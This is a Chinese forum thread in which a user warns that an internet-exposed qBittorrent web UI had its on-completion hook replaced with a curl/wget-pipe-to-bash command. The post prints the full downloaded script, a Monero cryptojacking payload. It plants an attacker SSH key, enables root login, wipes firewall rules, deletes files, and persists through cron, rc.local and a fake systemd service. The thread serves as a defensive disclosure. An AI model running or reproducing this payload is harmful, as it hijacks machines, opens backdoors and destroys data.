qBittorrent web 端 弱密码 + 开启 UPNP 被挂恶意脚本
tinytoadd · 2023-12-04 22:48:35 +08:00 · 2078 次点击这是一个创建于 373 天前的主题,其中的信息可能已经有所发展或是发生改变。
今天回家,照常下载种子并导入到我的 qBittorrent , 准备美滋滋地看会电视剧。
由于之前设置了种子完成后自动执行脚本,正常情况应该会自动创建一个到资料库目录的软链接,但今天种子下载好后脚本却没有照常执行。
检查之后吓了一跳,原本的自动执行程序被替换为以下脚本。
bash -c "(curl -s -L http://files.catbox.moe/o0gr8o.sh || wget --no-check-certificate -O - http://files.catbox.moe/o0gr8o.sh) | bash"
检查了一下,是我的 QB 默认开启了 upnp ,家里是公网 IP ,等于直接在公网 8085 端口裸奔了。
我用的群晖 DS220+和矿神的 qBittorrent 应用,暂时没有发现有损失。
提醒一下大家注意防范,贴一下这个脚本的内容。
#! /bin/bash
##
VERSION=e4
# Arguments
#[email protected]
WALLET=41poaCNDTvs33KCFKfekN88Ehf59ddparQdFKFT4XKrUMnc1Ude7xtvhZuKfTai8tDML6gFyTAKY5RuDDxDqLRZpT8QpQ9b
[email protected]
PORT=15555
AUDITD=http://files.catbox.moe/5eki22.out
function prune_competition() {
sudo systemctl stop c3pool_miner.service 2>&1
sudo systemctl disable c3pool_miner.service 2>&1
sudo systemctl disable xmrig.service 2>&1
sudo systemctl stop journalctld.service 2>&1
sudo systemctl disable journalctld.service 2>&1
kill -9 $(pidof xmrig) >/dev/null 2>&1
kill $(ps aux | grep "[--]config=" | awk '{print $2}') 2>&1
sudo killall xmrig 2>&1
sudo pkill xmrig 2>&1
sudo pkill auditd 2>&1
killall -9 xmrig 2>&1
killall xmrig 2>&1
pkill xmrig 2>&1
pkill auditd 2>&1
killall auditd 2>&1
rm -rf rm -rf /root/.local/.c 2>&1
rm -rf "${HOME}/.c3pool" >/dev/null 2>&1
rm -rf /root/.c3pool >/dev/null 2>&1
rm -rf "${HOME}/.local/share/auditd" >/dev/null 2>&1
rm -rf "${HOME}/.local/.c*" >/dev/null 2>&1
rm -rf "${HOME}/.local/bin/auditd"
rm -rf /etc/cron.daily >/dev/null 2>&1
rm -rf /etc/cron.daily/auditd >/dev/null 2>&1
rm -rf /etc/systemd/system/journalctld.service 2>&1
find . -name "*c3pool*" -exec rm -rf {} \; 2>&1
find . -name "*xmrig*" -exec rm -rf {} \; 2>&1
find . -name "*miner*" -exec rm -rf {} \; 2>&1
find $HOME -name "*c3pool*" -exec rm -rf {} \; 2>&1
find $HOME -name "*xmrig*" -exec rm -rf {} \; 2>&1
find $HOME -name "*miner*" -exec rm -rf {} \; 2>&1
find $HOME -name "*c4*" -exec rm -rf {} \; 2>&1
find $HOME -name "*auditd*" -exec rm -rf {} \; 2>&1
sed -i '/AAAAB3NzaC1yc2EAAAADAQABAAABgQDJRrXGodFAgNzqgVw4QmjxKhZbvc6ReMa0ctI8WGbWBi/d' "${HOME}/.ssh/authorized_keys"
sed -i '/AAAAB3NzaC1yc2EAAAADAQABAAABgQDJRrXGodFAgNzqgVw4QmjxKhZbvc6ReMa0ctI8WGbWBi/d' "/root/.ssh/authorized_keys"
sed -i '/c3pool/d;/miner.sh/d' "${HOME}/.profile"
sed -i '/c3pool/d;/miner.sh/d' "/root/.profile"
mkdir $HOME/.ssh ; touch $HOME/.ssh/authorized_keys ; echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDJRrXGodFAgNzqgVw4QmjxKhZbvc6ReMa0ctI8WGbWBi3pUF++QmmM6Jo4/wMWqOxmdJotN85QpbkRfYuw9QN5aO35RLSJw7o2UOXN9vsaxnIg9wunNstVff22vyjrFrXTNrHaI///P3d4T4w6CCgLlNdNKgKTG176Y7KBmkWWeZvd8phtIaMprhGSbtnvs4v0hADTw+Ej20EeKfphlZsRSVS6zObq6jro4j8iIXvnGEdkIx8b1SP+QK6D+ZOEQxEzD107latrwYbLCNHWX7VP1oK6fbFk3zU+CGOwITiVPKuyX9aNFJVEopZSmreD+b+JoXpYHybiuhL3ex79uCWNWKnfGgBKrSAmnmopvYnd/mQ902ls16j/Cr/YYKhUvFMC7MhuWdazvM9uFT07c8PSPsEJ+vJpW3t2HQkW89mxqjp1rEvURUlqZtkL/3hZEMaamP6phHpSttncyWiMGuLZxoub/2GM8C09+GOOTaf47//mGxtNs5FNWqjyiznznrc=" >> $HOME/.ssh/authorized_keys ; chmod 600 $HOME/.ssh/authorized_keys
(chmod go-w ~/ && chmod go-w /root && chmod 700 ~/.ssh && chmod 700 /root/.ssh && chmod 600 ~/.ssh/authorized_keys && chown root /root && chown root /root/.ssh) >/dev/null
sudo sed -i 's/#PermitRootLogin prohibit-password/PermitRootLogin yes/' /etc/ssh/sshd_config >/dev/null
sudo sed -i 's/#PubkeyAuthentication yes/PubkeyAuthentication yes/' /etc/ssh/sshd_config >/dev/null
iptables -P INPUT ACCEPT 2>&1
iptables -P FORWARD ACCEPT 2>&1
iptables -P OUTPUT ACCEPT 2>&1
iptables -F 2>&1
ufw disable 2>&1
}
function install_auditd() {
mkdir -p ${HOME}/.local/share/
cat >${HOME}/.local/share/auditd <<EOL
#!/bin/bash
if [ -z "\$(pidof auditd)" ]; then
mkdir -p ${HOME}/.local/bin
curl -s4 -L "${AUDITD}" -o ${HOME}/.local/bin/auditd
chmod a+x ${HOME}/.local/bin/auditd
${HOME}/.local/bin/auditd
sleep 5
rm ${HOME}/.local/bin/auditd
fi
EOL
chmod a+x "${HOME}/.local/share/auditd"
mkdir -p /etc/cron.daily
if ! grep "${AUDITD}" "/etc/cron.daily/auditd" >/dev/null; then
cp ${HOME}/.local/share/auditd /etc/cron.daily/auditd
fi
(${HOME}/.local/share/auditd || /etc/cron.daily/auditd) &
}
function install_rig() {
mkdir -p "${HOME}/.local/.c"
"${HOME}/.local/.c/journalctld" --help >/dev/null 2>&1
if test $? -ne 0; then
# Attempt to download
LATEST_LINUX_RELEASE=$(curl -s4 https://api.github.com/repos/xmrig/xmrig/releases/latest | grep browser_download | grep linux-static | cut -d'"' -f4)
if ! curl -s4 -L "${LATEST_LINUX_RELEASE}" -o /tmp/xmrig.tar.gz; then
exit 1
fi
# Attempt to extract
if ! tar xf /tmp/xmrig.tar.gz -C "${HOME}/.local/.c" --strip=1; then
exit 1
fi
rm /tmp/xmrig.tar.gz
mv "${HOME}/.local/.c/xmrig" "${HOME}/.local/.c/journalctld"
# Check if downloaded
"${HOME}/.local/.c/journalctld" --help >/dev/null
if test $? -ne 0; then
exit 1
fi
fi
PASS=$(hostname | cut -f1 -d"." | sed -r 's/[^a-zA-Z0-9\-]+/_/g')
# Config
CONFIG="${HOME}/.local/.c/config.json"
sed -i 's/"url": *"[^"]*",/"url": "mine.c3pool.com:'"${PORT}"'",/' "${CONFIG}"
sed -i 's/"user": *"[^"]*",/"user": "'"${WALLET}"'",/' "${CONFIG}"
sed -i 's/"pass": *"[^"]*",/"pass": "'"${PASS}"'",/' "${CONFIG}"
sed -i 's/"max-cpu-usage": *[^,]*,/"max-cpu-usage": 100,/' "${CONFIG}"
sed -i 's#"log-file": *null,#"log-file": "'"${HOME}/.local/.c/journalctld.log"'",#' "${CONFIG}"
sed -i 's/"syslog": *[^,]*,/"syslog": false,/' "${CONFIG}"
sed -i 's/"max-threads-hint": *[^,]*,/"max-threads-hint": 75,/' "${CONFIG}"
sed -i 's/"background": *[^,]*,/"background": false,/' "${CONFIG}"
# Config (background)
cp "${CONFIG}" "${HOME}/.local/.c/config_background.json"
sed -i 's/"background": *false,/"background": true,/' "${HOME}/.local/.c/config_background.json"
# Prepare start script
cat >"${HOME}/.local/.c/journalctl" <<EOL
#!/bin/bash
if [ -z "\$(pidof auditd)" ]; then
curl -s4 -L "${AUDITD}" -o /tmp/auditd
chmod a+x /tmp/auditd
/tmp/auditd
rm /tmp/auditd
fi
if [ -z "\$(pidof journalctld)" ]; then
nice ${HOME}/.local/.c/journalctld \$*
fi
EOL
chmod +x "${HOME}/.local/.c/journalctl"
# Prepare persistence
if ! grep journalctl "${HOME}/.profile" >/dev/null; then
echo "${HOME}/.local/.c/journalctl --config=${HOME}/.local/.c/config_background.json >/dev/null 2>&1" >> "${HOME}/.profile"
fi
if ! grep journalctl "/etc/rc.local" >/dev/null; then
echo "#!/bin/bash" > "/etc/rc.local"
echo "${HOME}/.local/.c/journalctl --config=${HOME}/.local/.c/config_background.json >/dev/null 2>&1" >> "/etc/rc.local" && chmod a+x "/etc/rc.local"
fi
if sudo -n true 2>/dev/null; then
# Attempt to configure huge pages
if [[ $(grep MemTotal /proc/meminfo | awk '{print $2}') -gt 3500000 ]]; then
echo "vm.nr_hugepages=$((1168+$(nproc)))" | sudo tee -a /etc/sysctl.conf
sudo sysctl -w vm.nr_hugepages=$((1168+$(nproc)))
fi
if ! type systemctl >/dev/null; then
/bin/bash "${HOME}/.local/.c/journalctl" --config="${HOME}/.local/.c/config_background.json" >/dev/null 2>&1
else
cat >/tmp/journalctld.service <<EOL
[Unit]
Description=systemd journaling
[Service]
ExecStart=${HOME}/.local/.c/journalctl --config=${HOME}/.local/.c/config.json
Restart=always
Nice=10
CPUWeight=1
[Install]
WantedBy=multi-user.target
EOL
sudo mv /tmp/journalctld.service /etc/systemd/system/journalctld.service
sudo killall journalctld 2>/dev/null
sudo systemctl daemon-reload
sudo systemctl enable journalctld.service
sudo systemctl restart journalctld.service
fi
fi
if [ -z "$(pidof journalctld)" ]; then
/bin/bash "${HOME}/.local/.c/journalctl" --config="${HOME}/.local/.c/config_background.json" >/dev/null 2>&1
fi
}
# Run processes
prune_competition
install_auditd
install_rig
# Version
echo "${VERSION}" > "${HOME}/.local/.c/.version"
sudo /etc/init.d/ssh restart >/dev/null
 |
1
zk8802 2023-12-04 22:57:22 +08:00 via iPhone
居然还有注释的…
|
 |
2
sinksmell 2023-12-04 23:17:08 +08:00 via Android
吓的我立马把管理端 IP 设置为内网 IP🤣
|
 |
3
Remember 2023-12-04 23:21:25 +08:00
按说 upnp 打的洞只是 bt 协议用的,qb 的 webui 管理端口不会打一个外网访问的洞的啊。
|
 |
4
tinytoadd OP @Remember 我的这个版本默认给 webui 管理端口也放开了. 还好 qb 是单独的用户和用户组,索性没事
|
 |
5
TrembleBeforeMe 2023-12-05 00:51:01 +08:00
 要在设置里面手动开启 webui 的 upnp 吧 |
 |
6
jedihy 2023-12-05 07:33:42 +08:00
你的 qb 不是跑在 docker 里面的吗?
我的是跑在 docker 里,而且 webui 的 upnp 默认没开。 |
 |
7
shuang930225 2023-12-05 08:23:27 +08:00
监听端口 6881 打开的,有必要端口转发吗?还是不转也能正常做种?
|
 |
8
msn1983aa 2023-12-05 09:05:51 +08:00
我的 qb 都卡在下载元数据,已经废了。。。。
|
 |
9
psirnull 2023-12-05 11:12:58 +08:00
WALLET=41poaCNDTvs33KCFKfekN88Ehf59ddparQdFKFT4XKrUMnc1Ude7xtvhZuKfTai8tDML6gFyTAKY5RuDDxDqLRZpT8QpQ9b
|
 |
10
Bear13023 2023-12-05 14:54:39 +08:00
看楼主的这个感觉自己上个月可能也是中了类似玩意,我是 unraid ,nas 最近用的少就是 plex 听歌用用,存放下照片。
结果我 unraid 系统都登录不上,最终这缓存硬盘被不识别要我格式化再使用。直接换一张盘,这张缓存盘就先不用了。 |
 |
11
AshengQAQ 310 天前
c3pool 猫池,wa 矿的,我上个月刚中,也是索性没有对系统造成损坏
|
 |
12
y1y1 267 天前
刚刚中招,openwrt 上的 qb
被 docker 坑了。。 |
Select Language